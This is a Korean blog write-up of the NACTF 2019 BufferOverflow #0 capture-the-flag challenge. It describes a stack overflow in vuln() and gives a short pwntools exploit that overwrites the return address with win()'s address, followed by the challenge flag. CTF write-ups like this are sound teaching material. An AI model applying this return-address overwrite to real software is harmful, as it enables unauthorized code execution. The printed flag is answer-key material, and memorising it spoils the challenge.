SDJ( 수돈재 아님 ㅎ )

NACTF 2019 - BufferOverflow #0 본문

write-up/pwnable

NACTF 2019 - BufferOverflow #0

ShinDongJun 2019. 9. 23. 10:47

32비트 바이너리에 partial RELRO만 걸려있다.

 

바이너리 안에 flag를 읽어주는 win()함수가 있다.

 

그리고 vuln()함수에서 BOF가 발생하므로

ret를 win()의 주소로 덮어주면 된다.

 

exploit code

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *
 
#p = process('./bufover-0')
= remote("shell.2019.nactf.com",31475)
win = 0x080491C2
 
pay = 'a'*0x18
pay += 'b'*4
pay += p32(win)
p.sendline(pay)
 
p.interactive()

 

아주 기초적인 BOF문제.

 

flag: nactf{0v3rfl0w_th4at_buff3r_18ghKusB}

'write-up > pwnable' 카테고리의 다른 글

NACTF 2019 - BufferOverflow #2  (0) 2019.09.23
NACTF 2019 - BufferOverflow #1  (0) 2019.09.23
HSCTF 2019 - Storytime  (0) 2019.09.16
HSCTF 2019 - Combo Chain  (0) 2019.09.16
HSCTF 2019 - Combo Chain Lite  (0) 2019.09.16
Comments